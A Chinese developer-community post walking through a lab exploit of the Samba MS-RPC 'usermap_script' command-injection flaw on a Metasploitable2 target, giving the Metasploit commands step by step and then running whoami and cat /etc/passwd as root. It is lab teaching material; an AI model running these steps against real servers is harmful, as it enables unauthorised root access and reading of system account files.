AI 助理
文档备案控制台
开发者社区 开发与运维 文章 正文

Samba MS-RPC Shell命令注入漏洞

2022-12-13 1000
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 靶场环境:metasploitable2靶机地址:192.168.0.109攻击机地址:192.168.0.114首先打开kali,启动msf框架

靶场环境:metasploitable2

靶机地址:192.168.0.109

攻击机地址:192.168.0.114

首先打开kali,启动msf框架

sudo msfdb run

image.png搜索漏洞模块

image.png

选择要利用的模块:

use exploit/multi/samba/usermap_script

image.png

查看所需要设置的参数

show options

我们看到只需要设置RHOSTS(靶机地址)

set rhosts 192.168.0.109

image.png

开始攻击

exploit

image.png

攻击成功

试着执行一下ls命令

image.png

执行成功

whoami查看当前权限为root

image.png

查看靶机ip 

ip a

image.png

查看敏感文件

cat /etc/passwd

image.png

ctrl+c退出

文章标签:
Shell
安全
关键词:
Shell命令
RPC注入
RPC漏洞
Shell命令注入漏洞
Shell漏洞
郝奕程
目录
相关文章
WanderInk-20107
|
12月前
|
存储 Unix Shell
Shell 输出命令完全指南:echo 与 printf 的深度剖析
本文深入解析了 Shell 编程中 `echo` 和 `printf` 两个核心输出命令的用法与区别。`echo` 简单易用,适合基础输出;`printf` 功能强大,支持复杂格式化。文章从语法、转义序列、高级技巧到实际应用场景(如日志记录、进度显示)逐一讲解,并对比两者的性能与适用场景,帮助开发者根据需求灵活选择。最后通过进阶技巧和常见问题解答,进一步提升对两者的掌握程度。
WanderInk-20107
685 1
游客jsajaypcl7mn4
|
网络协议 Shell 网络安全
面试官想听的不仅是命令——如何结构化回答“容器无Shell时如何测试外网”?
“说说看,如果一个Pod的容器没有Shell,如何测试它能否访问外网?”
游客jsajaypcl7mn4
483 1
面试官想听的不仅是命令——如何结构化回答“容器无Shell时如何测试外网”?
蓝易云
|
运维 Shell 数据库
Python执行Shell命令并获取结果:深入解析与实战
通过以上内容,开发者可以在实际项目中灵活应用Python执行Shell命令,实现各种自动化任务,提高开发和运维效率。
蓝易云
453 20
蓝易云
|
安全 Shell 数据处理
使用Python执行Shell命令并获取结果
在实际应用中,可以根据需要选择适当的参数和方法来执行Shell命令,并处理可能出现的各种情况。无论是系统管理、自动化任务还是数据处理,掌握这些技巧都将极大地提高工作效率。
蓝易云
635 12
蚝油菜花
|
人工智能 Shell iOS开发
AI Shell:在命令行里“对话” AI ,微软推出将 AI 助手引入命令行的 CLI 工具,打造对话式交互命令行
AI Shell 是一款强大的 CLI 工具,将人工智能直接集成到命令行中,帮助用户提高生产力。AI Shell 支持多种 AI 模型和助手,通过多代理框架提供丰富的功能和灵活的使用模式。
蚝油菜花
2326 7
刘大猫.
|
Java Shell Windows
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
java Runtime.exec()执行shell/cmd命令:常见的几种陷阱与一种完善实现
刘大猫.
520 1
java冯坚持
|
Web App开发 网络协议 Linux
linux命令总结(centos):shell常用命令汇总,平时用不到,用到就懵逼忘了,于是专门写了这篇论文,【便持续更新】
这篇文章是关于Linux命令的总结,涵盖了从基础操作到网络配置等多个方面的命令及其使用方法。
java冯坚持
1040 1
linux命令总结(centos):shell常用命令汇总,平时用不到,用到就懵逼忘了,于是专门写了这篇论文,【便持续更新】
听白
|
Shell 知识图谱
Shell printf 命令
10月更文挑战第3天
听白
172 1
听白
|
Shell PHP
Shell echo命令
10月更文挑战第3天
听白
158 0
游客qsxez56gggwqy
|
存储 安全 Shell
上传漏洞利用时,没有回显上传目录怎么连接shell
上传漏洞利用时,没有回显上传目录怎么连接shell
游客qsxez56gggwqy
578 2

热门文章

最新文章

  • 1
    Linux shell编程 2 ---- shell变量
  • 2
    <Power Shell>19 使用.NET class创建指定文件和零字节文件
  • 3
    C++ 中嵌入shell语言
  • 4
    超全整理!Linux shell及常用36类命令汇总(一)
  • 5
    Linux Shell常用命令总结
  • 6
    Linux【脚本 01】简单Shell脚本实现定时备份文件、压缩、删除超时文件操作(showDoc文件备份脚本举例)
  • 7
    Shell基础语法(上)
  • 8
    shell中date使用总结-基于自动定期备份mysql实践
  • 9
    shell下的进度条和最大最小平均值
  • 10
    hbase集群安装和shell操作
  • 1
    gRPC不是银弹:为内网极致性能,如何设计自己的RPC协议?
    433
  • 2
    RPC的三大问题:跨语言、跨平台通信的终极解决方案是如何炼成的?
    280
  • 3
    gRPC凭什么成为微服务通信首选?深度解析RPC进化史
    943
  • 4
    识别这些API接口定义(http,https,api,RPC,webservice,Restful api ,OpenAPI)
    4809
  • 5
    初探Go语言RPC编程手法
    256
  • 6
    Netty基础—6.Netty实现RPC服务
    361
  • 7
    利用HTTP POST协议实现简单的RPC协议:WireShark抓包分析
    624
  • 8
    利用HTTP POST协议实现简单的RPC协议,并使用WireShark进行抓包分析
    499
  • 9
    【YashanDB知识库】YCP高可用部署离线升级-rpc升级详细步骤
    196
  • 10
    【YashanDB知识库】YCP单机部署离线升级-rpc升级方式详细步骤
    498

    • 相关课程

    更多
  • Linux Shell 编程
  • Shell 脚本进阶
  • Shell 脚本入门
  • Linux Shell 编程入门与实战
  • Shell 编程入门到精通

    • 相关电子书

    更多
  • Shell 脚本速查手册
  • 低代码开发师(初级)实战教程
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    PHP:将本地文件上传到阿里云OSS存储